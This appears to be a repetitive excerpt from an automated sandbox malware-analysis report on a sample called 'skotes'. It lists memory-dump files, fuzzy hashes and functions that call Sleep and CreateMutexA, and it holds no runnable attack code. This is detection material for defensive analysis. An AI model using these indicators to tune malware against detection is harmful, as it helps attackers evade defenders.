Associated: 00000002.00000002.1728171850.0000000000C11000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728213831.0000000000C3F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728232513.0000000000C40000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728247730.0000000000C41000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728263275.0000000000C44000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728278033.0000000000C46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728295927.0000000000C56000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728313232.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_940000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: c99952667e35ffbb9e36b8b7e5b44e6a4ba89a3d3482ef9d92572abc8c1b4c79
Instruction ID: 508ec52e9cb675b2ff2282a91cac1f8609713949729900e167140d348fecdd89
Opcode Fuzzy Hash: c99952667e35ffbb9e36b8b7e5b44e6a4ba89a3d3482ef9d92572abc8c1b4c79
Instruction Fuzzy Hash: 083157327942009BFB18DB78DCC9FADB766DFC6314F248218E414977D1D73A99808B62

Function 0094A1AE Relevance: 3.1, APIs: 2, Instructions: 135
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 0094A963
CreateMutexA.KERNELBASE(00000000,00000000,009A3254), ref: 0094A981

Memory Dump Source

Source File: 00000002.00000002.1725053890.0000000000941000.00000040.00000001.01000000.00000007.sdmp, Offset: 00940000, based on PE: true

Associated: 00000002.00000002.1724966816.0000000000940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725053890.00000000009A2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725135977.00000000009A9000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725154631.00000000009AB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725202801.00000000009B7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726505694.0000000000B0F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726999851.0000000000B11000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727138941.0000000000B24000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727138941.0000000000B30000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727347622.0000000000B34000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727447955.0000000000B35000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727463935.0000000000B36000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727509744.0000000000B38000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727541811.0000000000B3A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727564744.0000000000B3C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727657950.0000000000B45000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727684532.0000000000B46000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727701099.0000000000B47000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727728553.0000000000B48000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727751037.0000000000B62000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727767350.0000000000B64000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727785108.0000000000B66000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727800965.0000000000B67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727817001.0000000000B6F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727837711.0000000000B74000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727856845.0000000000B75000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727872250.0000000000B79000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727889948.0000000000B8E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727907759.0000000000B91000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727923278.0000000000B92000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727940364.0000000000B96000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727955443.0000000000B9D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727970200.0000000000BA0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727987984.0000000000BA7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728004036.0000000000BA8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728022848.0000000000BB0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728037582.0000000000BB2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728053959.0000000000BC1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728068720.0000000000BC2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728086440.0000000000BC4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728101761.0000000000BC7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728116754.0000000000BCA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728132799.0000000000BD1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728155347.0000000000BEE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728171850.0000000000BF3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728171850.0000000000C11000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728213831.0000000000C3F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728232513.0000000000C40000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728247730.0000000000C41000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728263275.0000000000C44000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728278033.0000000000C46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728295927.0000000000C56000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728313232.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_940000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: e2894ed74167ee300591cbb4796c0e34c9125398fd6504f0706c43fbb4457c06
Instruction ID: 4384c9cd1fde7291b6b6909f420d611d6cfc906cb65d5b2b1051a95de750d5d1
Opcode Fuzzy Hash: e2894ed74167ee300591cbb4796c0e34c9125398fd6504f0706c43fbb4457c06
Instruction Fuzzy Hash: B93168317841419BFB18DB78DC89FADB766EFCA310F248318E414976D1D77A9A808752

Function 0094A418 Relevance: 3.1, APIs: 2, Instructions: 133
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 0094A963
CreateMutexA.KERNELBASE(00000000,00000000,009A3254), ref: 0094A981

Memory Dump Source

Source File: 00000002.00000002.1725053890.0000000000941000.00000040.00000001.01000000.00000007.sdmp, Offset: 00940000, based on PE: true

Associated: 00000002.00000002.1724966816.0000000000940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725053890.00000000009A2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725135977.00000000009A9000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725154631.00000000009AB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725202801.00000000009B7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726505694.0000000000B0F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726999851.0000000000B11000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727138941.0000000000B24000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727138941.0000000000B30000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727347622.0000000000B34000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727447955.0000000000B35000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727463935.0000000000B36000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727509744.0000000000B38000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727541811.0000000000B3A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727564744.0000000000B3C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727657950.0000000000B45000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727684532.0000000000B46000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727701099.0000000000B47000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727728553.0000000000B48000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727751037.0000000000B62000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727767350.0000000000B64000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727785108.0000000000B66000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727800965.0000000000B67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727817001.0000000000B6F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727837711.0000000000B74000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727856845.0000000000B75000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727872250.0000000000B79000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727889948.0000000000B8E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727907759.0000000000B91000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727923278.0000000000B92000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727940364.0000000000B96000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727955443.0000000000B9D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727970200.0000000000BA0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727987984.0000000000BA7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728004036.0000000000BA8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728022848.0000000000BB0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728037582.0000000000BB2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728053959.0000000000BC1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728068720.0000000000BC2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728086440.0000000000BC4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728101761.0000000000BC7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728116754.0000000000BCA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728132799.0000000000BD1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728155347.0000000000BEE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728171850.0000000000BF3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728171850.0000000000C11000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728213831.0000000000C3F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728232513.0000000000C40000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728247730.0000000000C41000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728263275.0000000000C44000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728278033.0000000000C46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728295927.0000000000C56000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728313232.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_940000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 0f964178662851e10e702d416b40d043b08e0e1867ee38fbf3da7245970dbcae
Instruction ID: 94aed3732df7c9a5eedc7fdc6d3e50910fdb6d51ec1d1cee1b3166f8af4d01ff
Opcode Fuzzy Hash: 0f964178662851e10e702d416b40d043b08e0e1867ee38fbf3da7245970dbcae
Instruction Fuzzy Hash: 2C3179327801009BEB18DB78DCCAFADB766EFC6314F248218E5149B7D6D77999808762

Function 0094A54D Relevance: 3.1, APIs: 2, Instructions: 132
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 0094A963
CreateMutexA.KERNELBASE(00000000,00000000,009A3254), ref: 0094A981

Memory Dump Source

Source File: 00000002.00000002.1725053890.0000000000941000.00000040.00000001.01000000.00000007.sdmp, Offset: 00940000, based on PE: true

Associated: 00000002.00000002.1724966816.0000000000940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725053890.00000000009A2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725135977.00000000009A9000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725154631.00000000009AB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725202801.00000000009B7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726505694.0000000000B0F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726999851.0000000000B11000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727138941.0000000000B24000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727138941.0000000000B30000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727347622.0000000000B34000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727447955.0000000000B35000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727463935.0000000000B36000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727509744.0000000000B38000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727541811.0000000000B3A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727564744.0000000000B3C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727657950.0000000000B45000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727684532.0000000000B46000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727701099.0000000000B47000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727728553.0000000000B48000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727751037.0000000000B62000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727767350.0000000000B64000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727785108.0000000000B66000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727800965.0000000000B67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727817001.0000000000B6F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727837711.0000000000B74000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727856845.0000000000B75000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727872250.0000000000B79000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727889948.0000000000B8E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727907759.0000000000B91000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727923278.0000000000B92000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727940364.0000000000B96000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727955443.0000000000B9D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727970200.0000000000BA0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727987984.0000000000BA7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728004036.0000000000BA8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728022848.0000000000BB0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728037582.0000000000BB2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728053959.0000000000BC1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728068720.0000000000BC2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728086440.0000000000BC4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728101761.0000000000BC7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728116754.0000000000BCA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728132799.0000000000BD1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728155347.0000000000BEE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728171850.0000000000BF3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728171850.0000000000C11000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728213831.0000000000C3F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728232513.0000000000C40000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728247730.0000000000C41000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728263275.0000000000C44000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728278033.0000000000C46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728295927.0000000000C56000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728313232.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_940000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 879a810be68f1ffe5f54b930385366d8ad275ec195f2568a9d4a3ce17c7f5527
Instruction ID: d8244afb489683f14be41e540f23df13db85e7428a42af519b1a6ba225b8878c
Opcode Fuzzy Hash: 879a810be68f1ffe5f54b930385366d8ad275ec195f2568a9d4a3ce17c7f5527
Instruction Fuzzy Hash: F4317B326851008BEB18EB78DD89FADB766EFC5314F24C218F4149B6D1D73999808722

Function 0094A682 Relevance: 3.1, APIs: 2, Instructions: 131
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 0094A963
CreateMutexA.KERNELBASE(00000000,00000000,009A3254), ref: 0094A981

Memory Dump Source

Source File: 00000002.00000002.1725053890.0000000000941000.00000040.00000001.01000000.00000007.sdmp, Offset: 00940000, based on PE: true

Associated: 00000002.00000002.1724966816.0000000000940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725053890.00000000009A2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725135977.00000000009A9000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725154631.00000000009AB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725202801.00000000009B7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726505694.0000000000B0F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726999851.0000000000B11000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727138941.0000000000B24000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727138941.0000000000B30000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727347622.0000000000B34000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727447955.0000000000B35000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727463935.0000000000B36000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727509744.0000000000B38000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727541811.0000000000B3A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727564744.0000000000B3C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727657950.0000000000B45000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727684532.0000000000B46000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727701099.0000000000B47000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727728553.0000000000B48000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727751037.0000000000B62000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727767350.0000000000B64000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727785108.0000000000B66000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727800965.0000000000B67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727817001.0000000000B6F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727837711.0000000000B74000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727856845.0000000000B75000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727872250.0000000000B79000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727889948.0000000000B8E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727907759.0000000000B91000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727923278.0000000000B92000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727940364.0000000000B96000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727955443.0000000000B9D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727970200.0000000000BA0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727987984.0000000000BA7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728004036.0000000000BA8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728022848.0000000000BB0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728037582.0000000000BB2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728053959.0000000000BC1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728068720.0000000000BC2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728086440.0000000000BC4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728101761.0000000000BC7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728116754.0000000000BCA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728132799.0000000000BD1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728155347.0000000000BEE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728171850.0000000000BF3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728171850.0000000000C11000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728213831.0000000000C3F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728232513.0000000000C40000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728247730.0000000000C41000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728263275.0000000000C44000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728278033.0000000000C46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728295927.0000000000C56000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728313232.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_940000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 80ff57dbf99bd4b6e2832ad05a4895ea787214b7a7773bc1c83df160c0f19aaa
Instruction ID: 4efe29296cb60488047897da32f38a34ffffc7a2901be3f4b2d522c8eab1c491
Opcode Fuzzy Hash: 80ff57dbf99bd4b6e2832ad05a4895ea787214b7a7773bc1c83df160c0f19aaa
Instruction Fuzzy Hash: DF314872A842008BEB18DB78DC89FADB7B6DFC1314F248618E514D77D1D73999808762

Function 00949ADC Relevance: 3.1, APIs: 2, Instructions: 107
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 0094A963
CreateMutexA.KERNELBASE(00000000,00000000,009A3254), ref: 0094A981

Memory Dump Source

Source File: 00000002.00000002.1725053890.0000000000941000.00000040.00000001.01000000.00000007.sdmp, Offset: 00940000, based on PE: true

Associated: 00000002.00000002.1724966816.0000000000940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725053890.00000000009A2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725135977.00000000009A9000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725154631.00000000009AB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725202801.00000000009B7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726505694.0000000000B0F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726999851.0000000000B11000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727138941.0000000000B24000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727138941.0000000000B30000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727347622.0000000000B34000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727447955.0000000000B35000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727463935.0000000000B36000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727509744.0000000000B38000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727541811.0000000000B3A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727564744.0000000000B3C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727657950.0000000000B45000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727684532.0000000000B46000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727701099.0000000000B47000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727728553.0000000000B48000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727751037.0000000000B62000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727767350.0000000000B64000.00000040.00000001.01000000.00000007.sdmpDownload File
